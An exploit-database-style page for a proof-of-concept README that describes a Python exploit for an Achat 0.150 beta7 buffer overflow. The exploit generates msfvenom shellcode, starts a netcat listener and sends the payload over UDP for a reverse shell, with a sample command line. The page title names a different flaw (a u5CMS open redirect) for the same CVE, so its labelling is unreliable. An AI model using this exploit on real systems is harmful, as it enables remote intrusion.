CVE-2015-1578 PoC — u5CMS 开放重定向漏洞

Source

Associated Vulnerability

Description

This is a proof-of-concept exploit for CVE-2015-1578, a buffer overflow vulnerability in Achat 0.150 beta7 on Windows. Exploitation leads to remote code execution via a crafted UDP packet.

Readme

# CVE-2015-1578-PoC

## Overview

This is a proof-of-concept exploit for **CVE-2015-1578**, a buffer overflow vulnerability in **Achat 0.150 beta7** on Windows. Exploitation leads to remote code execution via a crafted UDP packet.

## Purpose

This PoC is intended to serve as a clean, minimal, and well-structured example of exploit development. It demonstrates:

- Dynamic shellcode generation via `msfvenom`
- Argument-based targeting and configuration
- Integrated listener setup
- Simple payload delivery over UDP

## Video Tutorial

[![Video Tutorial](https://img.youtube.com/vi/92V7QXwGbxE/maxresdefault.jpg)](https://youtu.be/92V7QXwGbxE)

## Dependencies

- Python 3
- `msfvenom` (part of the Metasploit Framework)
- `rlwrap` (for enhanced Netcat usability)

## Features

- Dynamically creates the Unicode-encoded payload using `msfvenom`
- Automatically starts a listener using `rlwrap nc`
- Accepts clean command-line arguments
- Fails gracefully if optional payload modules are missing

## Arguments

`-i <target_ip>` Target IP address (required)
`-l, --lhost <listener_ip>` Local host IP for reverse shell (required)
`-p, --lport <port>` Local port for reverse shell (required)
`--rport <port>` Remote UDP port on target (default: 9256)

## Usage Example

```
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393
```

This will:
- Generate the payload with the provided LHOST and LPORT
- Launch a listener in a background thread
- Send the exploit payload over UDP to the target

File Snapshot

 [4.0K]  /data/pocs/f984ce37ebb0495774657864de606e311344148a
├── [3.9K]  chatter.py
├── [3.8K]  kallisti.py
└── [1.5K]  README.md

0 directories, 3 files

Remarks